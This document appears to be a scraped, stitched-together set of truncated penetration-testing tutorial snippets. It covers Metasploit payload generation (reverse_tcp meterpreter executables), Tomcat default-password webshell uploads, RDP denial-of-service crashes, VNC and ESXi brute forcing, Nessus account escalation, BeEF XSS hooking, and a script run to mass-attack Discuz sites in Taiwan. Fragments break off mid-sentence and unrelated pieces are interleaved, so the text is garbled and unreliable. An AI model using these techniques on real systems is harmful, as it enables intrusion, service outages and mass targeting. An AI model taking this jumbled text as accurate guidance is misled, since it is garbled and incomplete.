Package attack payload
msfpayload:
Usage: msfpayload [
Summary: summary and options of payload
C: C language
Perl: Perl
Ruby: Ruby
Raw: raw, allows the payload to be piped into msfencode and other tools
Js: JavaScript
Exe: Windows executable
Dll: DLL
Vba: VBA
War: WAR package
Example:
msfpayload -l | grep windows | grep reverse_tcp | grep meterpreter
msfpayload windows/meterpreter/reverse_tcp o: show options
msfpayload [payload] X >xx.exe
Attack load code
msfencode:
Usage: msfencode
OPTIONS:
-A -B -C -D -e -H Help banner: helpful ti
Use the Tomcat console default-password vulnerability to upload a Trojan file and get a webshell on the target host. After the Tomcat console is installed, you need to change the default management account promptly and eliminate weak passwords; a user who logs in successfully can deploy any web application, including a webshell.
First, use the Nmap tool to scan the target host
1.1 Use the Nmap command to scan the target host. Click on the left side of the desktop
Under Linux:
Start msfd: sudo msfd
Open connection: msfd -a
Check whether the port is open: netstat -tn
Connect to MSF remotely:
nc
Under Windows:
Open connection: msf> load msfd servername=[your IP address] serverport=[your port]
View connection: netstat -na
Access using Telnet: telnet
The window may show garbled text; the open-source tool PuTTY is recommended here, with brief instructions:
Here, choose Telnet, and then fill in the IP and port (hint:
information
- Attack by query statement
Parse the submitted query statement, find the list of matching domain names from es, and then load all the attack scripts of a module to attack.
python safecatcli.py -c [your class name] -q "[your query string]"
For example: attacking Taiwan's discuz hosts
python safecatcli.py -c discuz -q "Discuz Country:taiwan"
- Attack a specified domain name
That is, a submitted domain name is attacked by loading all scripts from the module.
python safecatcli.py -c
Options:
-p, --payload [payload] Payload to use. Specify a '-' or stdin to use M payloads
-l, --list [module_type] List a module type example: payloads, encoders, nops, all
-n, --nopsled [length] Prepend a nopsled of [length] size on to the payload
-f, --format [format] Format to output results in: raw, ruby, rb, perl, pl, c, js_be, js_le, java, dll, exe, exe-small, elf, macho, vba, vbs, loop-vbs, asp, war
-
To set up Kali Linux as a working platform, in addition to updating the system yesterday, some additional configuration is required, such as configuring Grub on a dual-boot system. You need to reconfigure Grub because after Kali is installed on the same hard disk as Windows, the default Grub startup item is Kali and the default timeout is 5 seconds, so on a real machine it often boots into Kali before you can react. Generally, the Grub configuration files are all configured to open the menu with the root permission unde
vulnerabilities found exist and that they can be exploited.
3. Security vulnerabilities and penetration code circulate within closed teams: having found a security vulnerability and produced penetration code, white hats notify the vendor to fix it and publish only after the vendor's fix. Black hats and grey hats generally share them secretly in small, closed teams to exploit the attack value of these security vulnerabilities and penetration code.
4. Security vulnerabilities and penetration code begin to spread, and
VNC password hack
VNC port 5900
Open the database first
Start MSF
VNC access without password
RDP Remote Desktop vulnerability
Win7 192.168.1.123
XP 192.168.1.122
Found two modules: one is a DoS module, one is a scanner module
Using the DoS denial-of-service attack module
Set the destination IP to XP
Run; XP shows a blue screen
Set the target service to Win7
Run; Win7 shows a blue screen too.
VMware ESXi password brute-forcing
Specifying a password dictionary
If the result is exploded, use
meterpreter > help

Core Commands
=============

    Command                    Description
    -------                    -----------
    ?                          Help menu
    background                 Backgrounds the current session
    bgkill                     Kills a background meterpreter script
    bglist                     Lists running background scripts
    bgrun                      Executes a meterpreter script as a background thread
    channel                    Displays information about active channels
    close                      Closes a channel
    disable_unicode_encoding   Disables encoding of unicode strings
    enable_unicode_encoding    Enables encoding of Unic
; db_connect postgres:[email protected]/postgres
[*] Rebuilding the module cache in the background...
msf > db_nmap
[*] Usage: db_nmap [nmap options]
After successfully connecting to the database, you can use the db_nmap command, which runs Nmap in the MSF terminal and automatically stores the Nmap results in the database.
instance
db_del_host      Remove one or more hosts from the database
db_del_port      Remove a port from the database
db_destroy       Delete an existing database
db_disconnect    Disconnect from the current DB instance
db_driver        Specify a database driver
db_hosts         List all hosts in the database
db_nmap          Execute nmap and record the output
db_notes         List all comments in the database
db_services      List all services in the database
db_vulns         List all vulnerabilities in the database
db_workspace     Switch the database workspace
db_
Tags: local stat host NIS tar TCP policy Create promotion
msf > load nessus
msf > nessus_connect fuckyou:[email protected]    Connect to Nessus
msf > nessus_user_add    Elevate the test user to admin
[email protected]:# nessus-admin
Login:xxxooo
Yest is isn't an administrative user. Does want to grant him admin rights? [y/n] Y
Test is now an administrator
msf > nessus_user_list    View the list of users
msf > nessus_policy_list    Select a scan rule
ID Name Comments
-- ---- --------
-1 Prepare for PCI-DSS audits (Section
Intranet penetration 1: Use the XSS vulnerability to access the intranet
0x01: Popular Science
BeEF is currently the most popular web framework attack platform in Europe and America. Its full name is The Browser Exploitation Framework Project. BeEF uses a simple XSS vulnerability to control the browser of the target host through a piece of JavaScript (hook.js), obtains detailed information about the host through the browser of the target host, and further scans
(1) Install the Python msgpack library; the MSF official documentation uses msgpack as its data serialization standard.
[email protected]:~# apt-get install python-setuptools
[email protected]:~# easy_install msgpack-python
(2) create